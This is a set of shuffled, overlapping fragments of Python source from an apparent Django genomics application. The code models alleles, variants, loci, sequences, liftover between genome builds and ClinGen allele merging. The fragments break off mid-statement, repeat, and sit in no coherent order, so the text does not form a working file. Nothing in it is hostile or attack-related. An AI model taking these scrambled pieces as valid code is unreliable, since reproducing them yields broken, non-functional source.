"= set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in",
"= models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a",
"genes.hgvs import get_hgvs_variant_tuple # Check if the other build shares existing contig genome_build_contigs",
"< self.alt.length @property def is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length",
"= conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s - deleting",
"and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference",
"return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele",
"in a VCF file (multiple Variants with different alt alleles point to the",
"if there is one, otherwise go to variant page return reverse('view_allele', kwargs={\"pk\": self.id})",
"class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return",
"def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern",
"1-to-1 \"\"\" # Some builds share contigs (eg GRCh37/38 share MT and some",
"= models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will show allele if there is",
"Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def",
"position, ref, alt = m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref,",
"AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple",
"md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele",
"Locus/Variant can have unique constraints) Postgres by default uses indexes for constraints, and",
"is None: if self.error: # Retry if server was down return self.error.get(\"errorType\") ==",
"conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors all subclass from this",
"\"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class",
"= Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position),",
"= models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin =",
"vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version :=",
"ValueError(f'Could not find a variant in allele {self.id} for build {genome_build}') if not",
"Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params =",
"build) is set in UploadedFile for the UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE)",
"ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: # Move",
"ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return",
"raise ValueError(f\"Attempt to merge {self} to itself!\") can_merge = True merge_log_message = f\"{other_allele}",
"calls to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\",",
"import RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils import md5sum_str from snpdb.models import",
"Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works if liftover was",
"AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source",
"unique_together = (\"contig\", \"position\", \"ref\") @property def chrom(self): return self.contig.name def __str__(self): return",
"variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build:",
"@staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in a genome build \"\"\"",
"genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool",
"alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple",
"(chrom, position, ref, alt) \"\"\" variant_tuple = None if m := regex_pattern.match(variant_string): chrom,",
"you know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp",
"= (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build:",
"VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model): \"\"\" We want to",
"@staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build,",
"other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message = f\"Error",
"drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source of",
"f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover =",
"variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod",
"pass if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is",
"error_message = models.TextField() class Meta: unique_together = ('liftover', 'allele') def __str__(self): return f\"{self.allele}",
"is only 1 Locus for a given chrom/position/ref per database (handled via insertion",
"= models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self, force_insert=False, force_update=False,",
"f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants - usually used",
"guarantee seq is unique (so Locus/Variant can have unique constraints) Postgres by default",
"VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from",
"IntegrityError from django.db.models import Value as V, QuerySet, F from django.db.models.deletion import CASCADE,",
"@property def is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length",
"return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def is_deletion(self) -> bool:",
"None if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def variant_alleles(self): return",
"source = f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model):",
"liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE)",
"format_chrom(chrom, want_chr) return chrom, position, ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE)",
"return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None if va := self.variantallele_set.filter(error__isnull=False).first(): error",
"for the UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool",
"get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\"",
"build For others (NCBI Remap) we need to write the source genome build",
"models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True)",
"LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True,",
"import django.dispatch from django.conf import settings from django.contrib.auth.models import User from django.db import",
"Tuple, Iterable, Set import django.dispatch from django.conf import settings from django.contrib.auth.models import User",
"ValueError: return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild,",
"the btree_gist extension (requires postgres Admin rights). Django 3 has ExclusionConstraint, Postgres contrib",
"GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate:",
"liftover. Can be slow (API call) If you know a VariantAllele exists for",
"not find any variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str,",
"@staticmethod def is_ref_alt_reference(ref, alt): return ref == alt or alt == '.' @property",
"Pattern, Tuple, Iterable, Set import django.dispatch from django.conf import settings from django.contrib.auth.models import",
"allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\"",
"or reference) \"\"\" # locus.ref should always be standard... return self.alt.is_standard_sequence() @property def",
"on error class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return",
"-> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele {self.pk}\" if",
"-> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self)",
"self.alt.length @property def is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length <",
"lazy import lazy from model_utils.managers import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos",
"the constraint on that. Another possible solution is to use Gist indexes but",
"origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only",
"unplaced scaffolds) - in those cases # we'll have the same variant linked",
"str): if format_spec == 'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele) else: return",
"and large TextFields give error of: \"index row requires x bytes, maximum size",
"v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user:",
"self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete:",
"VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild,",
"contains no VariantAlleles at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp:",
"conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set on error class",
"liftover was done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class",
"return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele: name",
"GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal",
"genome build to resolve to the same allele (due to our normalization not",
"VariantAllele below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will show",
"for c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool",
"one\", va.allele, va.genome_build, va.variant) va.delete() return can_merge @property def build_names(self) -> str: return",
"self.seq) class Locus(models.Model): \"\"\" 1 per line in a VCF file (multiple Variants",
"We only expect to store Alleles for a small fraction of Variants So",
"alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track",
"version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self,",
"existing contig genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all():",
"models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos",
"annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style",
"instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build)",
"- {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants - usually used as",
"to Allele.pk and then creating VariantAllele entries for the variant/allele Some AlleleConversionTools (eg",
"from the same genome build to resolve to the same allele (due to",
"others (NCBI Remap) we need to write the source genome build VCF first",
"variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def",
"want them on the Variant object - instead do 1-to-1 \"\"\" # Some",
"models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success",
"change point to same allele This is generally done via ClinGen Allele Registry,",
"self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig",
"snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN =",
"= True merge_log_message = f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele",
"gbc in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus = self.locus contig =",
"get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) ->",
"ClinGen AlleleRegistry) we can write the VCF in the desired genome build For",
"row requires x bytes, maximum size is 8191\" The easiest solution is to",
"raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection:",
"allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def",
"f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop",
"import CASCADE, DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions import Greatest from django.db.models.functions.text",
"not va and not best_attempt: raise ValueError(f'Could not find a variant in allele",
"# Retry if server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return",
"conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this",
"builds, but at least one # links there, and can't have another, so",
"= Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod",
"alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build)",
"We want to guarantee seq is unique (so Locus/Variant can have unique constraints)",
"models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model): \"\"\" We want",
"# pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id,",
"genome_build) -> Optional['Liftover']: \"\"\" Only works if liftover was done via VariantAlleleSource \"\"\"",
"status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\"",
"self.locus.ref, self.alt) def get_absolute_url(self): # will show allele if there is one, otherwise",
"-> Tuple[str, 'VariantCoordinate']: \"\"\" Used by to write VCF coordinates during liftover. Can",
"source genome build VCF first Alleles must have already been created - allele_source",
"match and variant.start <= end AND variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\":",
"get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern -",
"class Meta: unique_together = ('liftover', 'allele') def __str__(self): return f\"{self.allele} failed {self.liftover}: {self.error_message}\"",
"g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\")",
"{merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if",
"update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int = 20): if len(s) > max_length:",
"!= ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self):",
"this allele \"\"\" if self == other_allele: raise ValueError(f\"Attempt to merge {self} to",
"small fraction of Variants So don't want them on the Variant object -",
"= variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool = None g_hgvs = None if self.clingen_allele:",
"postgres Admin rights). Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add",
"return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build",
"generally done via ClinGen Allele Registry, but sometimes that can fail. Linked against",
"genome build VCF first Alleles must have already been created - allele_source used",
"chrom(self): return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent",
"return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via",
"__str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants -",
"is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def",
"django.dispatch from django.conf import settings from django.contrib.auth.models import User from django.db import models,",
"django.db.models.functions import Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils import Q, FilteredRelation from",
"\"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)",
"r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome",
"fail. Linked against Variant with VariantAllele below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE)",
"dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs,",
"to our normalization not being the same as ClinGen or 2 loci in",
"possible to retrieve in all builds, but at least one # links there,",
"2 loci in a genome build being represented by 1 loci in the",
"constraint on that. Another possible solution is to use Gist indexes but that",
"abbreviate=False) -> str: if abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position}",
"Query handling indels. Contigs must match and variant.start <= end AND variant.end_position >=",
"= vas.filter(genome_build=genome_build).first() if not va and not best_attempt: raise ValueError(f'Could not find a",
"from this pass if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if",
"VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) != self.full_string @lazy",
"receiver from django.urls.base import reverse from django_extensions.db.models import TimeStampedModel from lazy import lazy",
"same allele This is generally done via ClinGen Allele Registry, but sometimes that",
"= Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build:",
"given locus/alt per database (handled via insertion queues) \"\"\" REFERENCE_ALT = \"=\" locus",
"django.db import models, IntegrityError from django.db.models import Value as V, QuerySet, F from",
"missing representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37:",
"return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can",
"def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"]",
"get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class",
"genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can",
"of variants - usually used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"]",
"build VCF first Alleles must have already been created - allele_source used to",
"gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs} @lazy def coordinate(self)",
"return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN)",
"message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model): \"\"\"",
"= self.allele if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) ->",
"for va in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool = conversion_tool va.save() except",
"but sometimes that can fail. Linked against Variant with VariantAllele below \"\"\" clingen_allele",
"2+ per line in a VCF file (ref + >= 1 alts pointing",
"{self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used by to write",
"@staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs = qs.filter(q) return dict(qs.values_list(\"seq\",",
"def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele =",
"self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build):",
"va.allele return None @property def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if not",
"AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF in the desired genome",
"= VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None @property def equivalent_variants(self) -> Iterable['Variant']:",
"to write VCF coordinates during liftover. Can be slow (API call) If you",
"self.alt) def get_absolute_url(self): # will show allele if there is one, otherwise go",
"class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through a VCF where ID is",
"self va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s",
"one, otherwise go to variant page return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) ->",
"return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True))",
"of alleles for liftover pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self): return None",
"bytes, maximum size is 8191\" The easiest solution is to md5sum seq and",
"{self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants - usually used as a",
"Variant(models.Model): \"\"\" Variants represent the different alleles at a locus Usually 2+ per",
"gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus = self.locus contig = locus.contig return",
"GenomeBuild): \"\"\" Restrict to contigs in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod",
"flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None if va",
"f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position,",
"not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav =",
"import md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import",
"return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\") -> bool: \"\"\" Merge other_allele",
"LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model):",
"Postgres contrib has BtreeGistExtension to add via migration \"\"\" seq = models.TextField() seq_md5_hash",
"get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used by to write VCF coordinates",
"TextFields give error of: \"index row requires x bytes, maximum size is 8191\"",
"= genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string:",
"variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check if",
"return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self):",
"class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\"",
"one, otherwise go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self)",
